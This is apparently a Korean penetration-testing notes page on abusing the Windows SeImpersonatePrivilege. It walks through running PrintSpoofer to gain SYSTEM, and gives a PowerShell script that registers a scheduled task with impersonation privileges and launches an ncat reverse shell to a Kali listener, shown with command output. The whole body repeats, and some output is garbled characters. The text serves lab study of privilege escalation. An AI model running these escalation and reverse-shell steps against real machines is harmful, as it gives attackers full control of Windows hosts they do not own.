SeImpersonatePrivilege

PreviousWindows NextUnquoted Service Path

Last updated 5 months ago

Was this helpful?

Practice

whoami /priv를 통해서 가진 권한 목록을 확인할 수 있으며

현재 사용자에게는 SeImpersonatePrivilege 권한이 있는 것이 확인됩니다.

C:\Windows\Temp>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

아래래 깃허브 링크를 통해서 실행파일을 설치한 뒤에 Windows 환경으로 옮긴후 실행해줍니다. 파일 실행 후에는 system 권한을 획득한 것을 확인할 수 있습니다.

PrintSpoofer64.exe -i -c cmd

C:\Windows\Temp>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

SeImpersonatePrivilege 권한이 없는 상태에서

강제적으로 이 권한을 부여한 사용자를 생성한 뒤에,

그 사용자의 권한으로 리버스 쉘을 연결하여 권한상승을 하는 실습을 진행하겠습니다.

실습을 위해 Kali 환경에서 nc 포트를 열어두고 Windows 파워쉘에서

리버스쉘 코드를 통해서 ncat을 통해 쉘을 연결시켜줍니다.

PS C:\Users\yeonu> whoami /priv
whoami /priv

----------------------
                                                                                         
========================================= ======================================================== ==========
SeIncreaseQuotaPrivilege                                                
SeTakeOwnershipPrivilege                                      
SeLoadDriverPrivilege                                                         
SeSystemtimePrivilege                                                         
SeProfileSingleProcessPrivilege                                           
SeIncreaseBasePriorityPrivilege

현재 사용자의 쉘에서는 SeImpersonatePrivilege 권한이 없는 것이 확인되었습니다.

하지만 스케줄 생성/실행 권한만 있다면 이 권한을 부여하는 것이 가능합니다. 먼저 Windows 환경에서 ncat 등과 같이 쉘 연결이 가능한 프로그램의 위치를 찾은 후

리버스쉘 명령어를 파워쉘 인자 부분에 삽입합니다.

[System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseWorkingSetPrivilege"
$TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs
$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -command ""& 'C:\Program Files (x86)\Nmap\ncat' 192.168.200.132 8888 -e cmd.exe"""
Register-ScheduledTask -Action $TaskAction -TaskName "ReverseShell" -Principal $TaskPrincipal
Start-ScheduledTask -TaskName "ReverseShell"

이 코드는 아래의 기본적인 권한을 하나의 배열로 담아줍니다.

SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseWorkingSetPrivilege

그리고 이 배열을 사용자의 소유 권한으로 지정하기 위해 새로운 사용자를 생성하는데

사용자의 이름은 LOCALSERVICE로 지정합니다.

로그온 타입은 서비스 계정이며 권한은 지정한 배열을 삽입해줍니다.

그리고 새로운 스케줄을 생성해주는데, 그 스케줄은 파워쉘을 실행시켜서

ncat을 통해 원격 접속을 cmd.exe로 연결하게끔 하는 스케줄입니다.

마지막으로 스케줄을 등록할 때 스케줄의 실행 주체는

최소 권한을 가지는 Local Service 계정으로 실행합니다.

┌──(root㉿kali)-[~/Pentest/Scripts]
└─# nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.200.132] from (UNKNOWN) [192.168.200.1] 57659
Microsoft Windows [Version 10.0.26100.2161]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32>whoami /priv
whoami /priv

  
----------------------

                                              
============================= ========================= ==========
SeAssignPrimaryTokenPrivilege μ  ū ٲٱ   
SeAuditPrivilege                              
SeChangeNotifyPrivilege       Ʈ ˻               
SeImpersonatePrivilege          Ŭ          
SeCreateGlobalPrivilege        ü                 
SeIncreaseWorkingSetPrivilege μ ۾

C:\Windows\System32>whoami
whoami
nt authority\local service

연결된 쉘에서는 whoami /priv를 사용했을 때

[System.String[]]$Privs 변수에 삽입했던 권한들이 부여된 것이 확인됩니다.

또한 우리가 이 사용자로 연결할 때 명명한 LOCALSERVICE 라는 계정 이름이

whoami의 결과에서 확인됩니다.

Practice

whoami /priv를 통해서 가진 권한 목록을 확인할 수 있으며

현재 사용자에게는 SeImpersonatePrivilege 권한이 있는 것이 확인됩니다.

C:\Windows\Temp>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

PrintSpoofer64.exe -i -c cmd

C:\Windows\Temp>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

SeImpersonatePrivilege 권한이 없는 상태에서

강제적으로 이 권한을 부여한 사용자를 생성한 뒤에,

그 사용자의 권한으로 리버스 쉘을 연결하여 권한상승을 하는 실습을 진행하겠습니다.

실습을 위해 Kali 환경에서 nc 포트를 열어두고 Windows 파워쉘에서

리버스쉘 코드를 통해서 ncat을 통해 쉘을 연결시켜줍니다.

PS C:\Users\yeonu> whoami /priv
whoami /priv

----------------------
                                                                                         
========================================= ======================================================== ==========
SeIncreaseQuotaPrivilege                                                
SeTakeOwnershipPrivilege                                      
SeLoadDriverPrivilege                                                         
SeSystemtimePrivilege                                                         
SeProfileSingleProcessPrivilege                                           
SeIncreaseBasePriorityPrivilege

현재 사용자의 쉘에서는 SeImpersonatePrivilege 권한이 없는 것이 확인되었습니다.

리버스쉘 명령어를 파워쉘 인자 부분에 삽입합니다.

[System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseWorkingSetPrivilege"
$TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs
$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -command ""& 'C:\Program Files (x86)\Nmap\ncat' 192.168.200.132 8888 -e cmd.exe"""
Register-ScheduledTask -Action $TaskAction -TaskName "ReverseShell" -Principal $TaskPrincipal
Start-ScheduledTask -TaskName "ReverseShell"

이 코드는 아래의 기본적인 권한을 하나의 배열로 담아줍니다.

SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseWorkingSetPrivilege

그리고 이 배열을 사용자의 소유 권한으로 지정하기 위해 새로운 사용자를 생성하는데

사용자의 이름은 LOCALSERVICE로 지정합니다.

로그온 타입은 서비스 계정이며 권한은 지정한 배열을 삽입해줍니다.

그리고 새로운 스케줄을 생성해주는데, 그 스케줄은 파워쉘을 실행시켜서

ncat을 통해 원격 접속을 cmd.exe로 연결하게끔 하는 스케줄입니다.

마지막으로 스케줄을 등록할 때 스케줄의 실행 주체는

최소 권한을 가지는 Local Service 계정으로 실행합니다.

┌──(root㉿kali)-[~/Pentest/Scripts]
└─# nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.200.132] from (UNKNOWN) [192.168.200.1] 57659
Microsoft Windows [Version 10.0.26100.2161]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32>whoami /priv
whoami /priv

  
----------------------

                                              
============================= ========================= ==========
SeAssignPrimaryTokenPrivilege μ  ū ٲٱ   
SeAuditPrivilege                              
SeChangeNotifyPrivilege       Ʈ ˻               
SeImpersonatePrivilege          Ŭ          
SeCreateGlobalPrivilege        ü                 
SeIncreaseWorkingSetPrivilege μ ۾

C:\Windows\System32>whoami
whoami
nt authority\local service

연결된 쉘에서는 whoami /priv를 사용했을 때

[System.String[]]$Privs 변수에 삽입했던 권한들이 부여된 것이 확인됩니다.

또한 우리가 이 사용자로 연결할 때 명명한 LOCALSERVICE 라는 계정 이름이

whoami의 결과에서 확인됩니다.

SeImpersonatePrivilege

SeImpersonatePrivilege

Practice

References

Practice

References